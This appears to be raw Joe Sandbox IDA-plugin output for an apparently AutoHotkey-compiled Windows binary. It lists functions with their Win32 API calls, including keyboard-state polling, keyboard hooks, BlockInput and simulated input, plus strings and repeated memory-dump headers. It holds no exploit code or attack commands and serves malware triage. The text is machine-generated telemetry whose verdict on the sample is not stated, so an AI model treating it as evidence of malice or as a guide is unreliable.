0x%08X - , xrefs: 00454DA8
Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d, xrefs: 00454DF9

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00463B12, Relevance: 13.8, APIs: 9, Instructions: 287window

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00463B17
SendMessageA.USER32(?,00000190,00000000,00000000), ref: 00463B34

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

SendMessageA.USER32(?,00000191,00000000,00000000), ref: 00463B63
__itow.LIBCMT ref: 00463BC0
SendMessageA.USER32(?,0000018A,?,00000000), ref: 00463C44
__itow.LIBCMT ref: 00463C9F
SendMessageA.USER32(?,00000189,?,004ABB26), ref: 00463CF0

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

SendMessageA.USER32(?,00000188,00000000,00000000), ref: 00463D2C
SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 00463D50

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00451B70, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133

APIs

GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 00451B8D
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451BC8
GetFileAttributesA.KERNEL32(?), ref: 00451BFD
GetFileAttributesA.KERNEL32(?), ref: 00451C10

Part of subcall function 00452500: GetFullPathNameA.KERNEL32(?,00000104,?,?,757E6DBE), ref: 00452520
Part of subcall function 00452500: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00452565
Part of subcall function 00452500: __wsplitpath.LIBCMT ref: 004525AD
Part of subcall function 00452500: __wsplitpath.LIBCMT ref: 004525D4

SHFileOperation.SHELL32(00000000), ref: 00451D07

Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 004519FD
Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451A38
Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A6D
Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A80
Part of subcall function 004519E0: SHFileOperation.SHELL32 ref: 00451B58

Part of subcall function 00451D20: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451D37
Part of subcall function 00451D20: GetFileAttributesA.KERNEL32(?), ref: 00451D65
Part of subcall function 00451D20: RemoveDirectoryA.KERNEL32(?), ref: 00451D8C
Part of subcall function 00451D20: SHFileOperation.SHELL32 ref: 00451DE6

Strings

\, xrefs: 00451BDF
\, xrefs: 00451BA1

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045AED2, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91window

APIs

SendMessageA.USER32(?,00001002,00000001,?), ref: 0045AF1D

Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004714E3
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 0047150C
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471541
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471572
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715A4
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715D6
Part of subcall function 004714C0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0047141F,00000000,?), ref: 00471679

SendMessageA.USER32(?,00001002,00000000,?), ref: 0045AF02
GetWindowLongA.USER32 ref: 0045AF33
SetWindowLongA.USER32(?,000000F0,00000000), ref: 0045AF5F
SendMessageA.USER32(?,00001005,00000000,?), ref: 0045AF7C

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Strings

Time, xrefs: 0045AF87
LongDate, xrefs: 0045AF43

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0043ED30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73

APIs

SetCurrentDirectoryA.KERNEL32(004987E9), ref: 0043ED3E
GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043ED7D
SetCurrentDirectoryA.KERNEL32(?), ref: 0043EDBA
GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043EDC6
_strncpy.LIBCMT ref: 0043EDD3

Strings

%s\, xrefs: 0043EDA7
C:\Users\user\Desktop, xrefs: 0043ED66, 0043ED77, 0043ED94, 0043EDC0, 0043EDD2

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004017DA, Relevance: 12.2, APIs: 8, Instructions: 177windowkeyboardtime

APIs

Part of subcall function 004030C0: joyGetPosEx.WINMM ref: 004030EF

Part of subcall function 00402F00: GetTickCount.KERNEL32(?,0000000A), ref: 00402F83
Part of subcall function 00402F00: _strncpy.LIBCMT ref: 00402FF3

Part of subcall function 00463460: PostMessageA.USER32(?,00000414,2AF80007,00000000), ref: 00463476

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

Part of subcall function 00463400: ShowWindow.USER32(?,00000000), ref: 0046340A

Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D

Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6EA
Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6FB
Part of subcall function 0040C660: Sleep.KERNEL32(00000000), ref: 0040C7AB

Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
Part of subcall function 0040A3F0: GetTickCount.KERNEL32 ref: 0040A53A
Part of subcall function 0040A3F0: PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00402EC0: GetTickCount.KERNEL32(00402D03,?,?,?,?,?,?), ref: 00402EC0

GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040146F

Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2

GetMessageA.USER32(?,00000000,00000000,-00000311), ref: 004014B6
GetTickCount.KERNEL32 ref: 004014C1
GetFocus.USER32 ref: 0040155B

Part of subcall function 004764E0: GetWindowLongA.USER32(?,000000F0), ref: 004764F4
Part of subcall function 004764E0: GetParent.USER32(?), ref: 00476504
Part of subcall function 004764E0: GetWindowLongA.USER32(00000000,000000F0), ref: 0047650F

ShowWindow.USER32(000601DA,00000000), ref: 00401B84

Part of subcall function 0045A160: GetWindowLongA.USER32(00000000,000000F0), ref: 0045A1A0
Part of subcall function 0045A160: GetParent.USER32(00000000), ref: 0045A1AA

TranslateAccelerator.USER32(00000000,?,?), ref: 004015A1

Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012BC
Part of subcall function 004012B0: GetParent.USER32(00000000), ref: 004012C7
Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012D4

Part of subcall function 00466F60: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00466F7A
Part of subcall function 00466F60: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00466FB2
Part of subcall function 00466F60: SendMessageA.USER32(?,0000130C,-00000001,00000000), ref: 00466FF6
Part of subcall function 00466F60: GetDlgCtrlID.USER32 ref: 00467012
Part of subcall function 00466F60: PostMessageA.USER32(?,00000414,?,00000000), ref: 0046708A

PeekMessageA.USER32(?,00000000,00000000,-00000311,00000001), ref: 00401845
GetTickCount.KERNEL32 ref: 00401853
Sleep.KERNEL32(00000000), ref: 00401874
GetKeyState.USER32(00000011), ref: 004018EA
GetWindowLongA.USER32(?,000000F0), ref: 00401912
GetKeyState.USER32(00000010), ref: 00401954
GetKeyState.USER32(00000011), ref: 004019C0
GetKeyState.USER32(000000A5), ref: 004019D5
SendMessageA.USER32(?,000000C2,00000001,0049881C), ref: 00401A1F
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00401A3C
SendMessageA.USER32(00000000,00001116,00000000,00000000), ref: 00401A79
SendMessageA.USER32(00000000,00001116,00000001,00000000), ref: 00401A93
IsDialogMessage.USER32(?,?), ref: 00401AE3
KillTimer.USER32(000601DA,00000009), ref: 00401C52
GetForegroundWindow.USER32 ref: 00401CEB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401CFE
GetClassNameA.USER32(00000000,?,00000020), ref: 00401D1B
IsDialogMessage.USER32(00000000,?), ref: 00401D5A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 00401D76
DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 00401EA8
DragFinish.SHELL32(?), ref: 00401EC3
GetTickCount.KERNEL32 ref: 00402122
DragFinish.SHELL32(00000000), ref: 004021C9
DragFinish.SHELL32(00000000), ref: 004021FA
GetTickCount.KERNEL32 ref: 0040225B
GetTickCount.KERNEL32 ref: 00402275
_strncpy.LIBCMT ref: 00402293
_strncpy.LIBCMT ref: 004022B2
_strncpy.LIBCMT ref: 00402317

Part of subcall function 004034E0: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
Part of subcall function 004034E0: GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7

GetTickCount.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402343
TranslateAccelerator.USER32(000601DA,0024027F,?), ref: 00402D3F
TranslateMessage.USER32(?), ref: 00402D68
DispatchMessageA.USER32(?), ref: 00402D73

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040EAD0, Relevance: 12.1, APIs: 8, Instructions: 122keyboard

APIs

GetAsyncKeyState.USER32(000000A0), ref: 0040EB06
GetAsyncKeyState.USER32(000000A1), ref: 0040EB19
GetAsyncKeyState.USER32(000000A2), ref: 0040EB2D
GetAsyncKeyState.USER32(000000A3), ref: 0040EB41
GetAsyncKeyState.USER32(000000A4), ref: 0040EB55
GetAsyncKeyState.USER32(000000A5), ref: 0040EB69
GetAsyncKeyState.USER32(0000005B), ref: 0040EB7A
GetAsyncKeyState.USER32(0000005C), ref: 0040EB8B

Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409

Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00411440, Relevance: 12.1, APIs: 8, Instructions: 77keyboard

APIs

GetAsyncKeyState.USER32(000000A0), ref: 00411465
GetAsyncKeyState.USER32(000000A1), ref: 00411478
GetAsyncKeyState.USER32(000000A2), ref: 0041148C
GetAsyncKeyState.USER32(000000A3), ref: 004114A0
GetAsyncKeyState.USER32(000000A4), ref: 004114B4
GetAsyncKeyState.USER32(000000A5), ref: 004114C8
GetAsyncKeyState.USER32(0000005B), ref: 004114D9
GetAsyncKeyState.USER32(0000005C), ref: 004114EA

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004885C8, Relevance: 12.1, APIs: 8, Instructions: 61

APIs

InterlockedDecrement.KERNEL32(004011C4), ref: 004885E2
InterlockedDecrement.KERNEL32(753BFD70), ref: 004885EF
InterlockedDecrement.KERNEL32(664815FF), ref: 004885FC
InterlockedDecrement.KERNEL32(57187210), ref: 00488609
InterlockedDecrement.KERNEL32(0674FF85), ref: 00488616
InterlockedDecrement.KERNEL32(0674FF85), ref: 00488632
InterlockedDecrement.KERNEL32(004A6920), ref: 00488642
InterlockedDecrement.KERNEL32(813C3902), ref: 00488658

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00420DB0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 405

APIs

_strncpy.LIBCMT ref: 00420E09

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

Part of subcall function 00485D47: RtlReAllocateHeap.NTDLL(00000000,00000000,0049555D,00000000), ref: 00485D86
Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DC9
Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DE1

Strings

Variable name too long., xrefs: 00420DEB
Out of memory., xrefs: 004210D8
ErrorLevel, xrefs: 00420E53
", xrefs: 00420EE2
Illegal parameter name., xrefs: 00420E98

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040FA10, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 164library

APIs

GetProcAddress.KERNEL32(00000000), ref: 0040FC61

Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C33
Part of subcall function 00408C20: CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse,?,001BC918,?,0040D55D), ref: 00408C3E
Part of subcall function 00408C20: GetLastError.KERNEL32 ref: 00408C46
Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C6D

GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040FB0C
GetProcAddress.KERNEL32(00000000), ref: 0040FB13

Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF0C
Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF2E
Part of subcall function 0040FE10: GetCursorPos.USER32(?), ref: 0040FF8B
Part of subcall function 0040FE10: WindowFromPoint.USER32(?,?), ref: 0040FF9B
Part of subcall function 0040FE10: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040FFBB
Part of subcall function 0040FE10: SendMessageA.USER32(00000000,00000084,00000000,?), ref: 0040FFE5
Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 00410138
Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 004101A4

Part of subcall function 0040FC90: GetSystemMetrics.USER32(00000017), ref: 0040FCD7
Part of subcall function 0040FC90: GetSystemMetrics.USER32(00000017), ref: 0040FCF4

Part of subcall function 00410200: GetCursorPos.USER32(004A9140), ref: 00410298
Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 004102B5
Part of subcall function 00410200: GetSystemMetrics.USER32(00000000), ref: 00410310
Part of subcall function 00410200: GetSystemMetrics.USER32(00000001), ref: 00410316
Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 00410375

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00410820: SendInput.USER32(00000000,00000000,0000001C), ref: 00410880
Part of subcall function 00410820: GetForegroundWindow.USER32 ref: 004108C3
Part of subcall function 00410820: SetWindowsHookExA.USER32(00000001,0040EC50,00400000,00000000), ref: 00410900

GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040FC5A

Strings

BlockInput, xrefs: 0040FB02, 0040FC50
user32, xrefs: 0040FB07, 0040FC55

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00410200, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163

APIs

GetCursorPos.USER32(004A9140), ref: 00410298
GetCursorPos.USER32(?), ref: 004102B5
GetSystemMetrics.USER32(00000000), ref: 00410310
GetSystemMetrics.USER32(00000001), ref: 00410316
GetCursorPos.USER32(?), ref: 00410375

Part of subcall function 004526F0: mouse_event.USER32(00008001,-80000000,-80000000,00000000,FFC3D44D), ref: 004527F3

Part of subcall function 004103F0: mouse_event.USER32(?,?,?,00000001,FFC3D44D), ref: 0041043F

Part of subcall function 00410A50: Sleep.KERNEL32(?,?,004101AF), ref: 00410B36

Part of subcall function 00472C70: GetForegroundWindow.USER32 ref: 00472C74
Part of subcall function 00472C70: IsIconic.USER32(00000000), ref: 00472C81
Part of subcall function 00472C70: GetWindowRect.USER32(00000000,?), ref: 00472C97
Part of subcall function 00472C70: ClientToScreen.USER32 ref: 00472CB5

Strings

d, xrefs: 00410359

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00469250, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139window

APIs

SetMenuItemInfoA.USER32 ref: 004693CF

Strings

BarBreak, xrefs: 00469351
Right, xrefs: 00469307
0, xrefs: 004693BB
Break, xrefs: 0046932F
Radio, xrefs: 004692D6

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040A3F0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106window

APIs

GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

GetTickCount.KERNEL32 ref: 0040A53A

Strings

%u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file), xrefs: 0040A4BE
call, xrefs: 0040A48F

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045EE7D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71window

APIs

Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C

SelectObject.GDI32(?,?), ref: 0045E6AA
ReleaseDC.USER32(?,?), ref: 0045E6B5
CreateWindowExA.USER32(?,msctls_trackbar32,004987E9,?,?,?,?,?,?,?,00400000,00000000), ref: 0045EEBE
SendMessageA.USER32(?,00000405,00000001,00000000), ref: 0045EF09

Part of subcall function 004665C0: SendMessageA.USER32(00000000,00000402,00000000,00000000), ref: 004665D4
Part of subcall function 004665C0: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 004665E8

SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
GetClientRect.USER32(?,?), ref: 0045F2EF
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
GetWindowRect.USER32(?,?), ref: 0045F38E
SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
GetWindowRect.USER32(?,?), ref: 0045F40B
MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F

Part of subcall function 00466600: SendMessageA.USER32(?,00000407,00000000,?), ref: 00466621
Part of subcall function 00466600: SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00466631
Part of subcall function 00466600: SendMessageA.USER32(?,00000414,?,00000000), ref: 00466653
Part of subcall function 00466600: SendMessageA.USER32(00000000,00000417,00000000,00000000), ref: 00466667
Part of subcall function 00466600: SendMessageA.USER32(?,00000415,00000000,?), ref: 0046667B
Part of subcall function 00466600: SendMessageA.USER32(?,0000041B,00000001,00000000), ref: 0046668F
Part of subcall function 00466600: SendMessageA.USER32(?,0000041F,?,00000000), ref: 004666A4
Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000001), ref: 004666BA
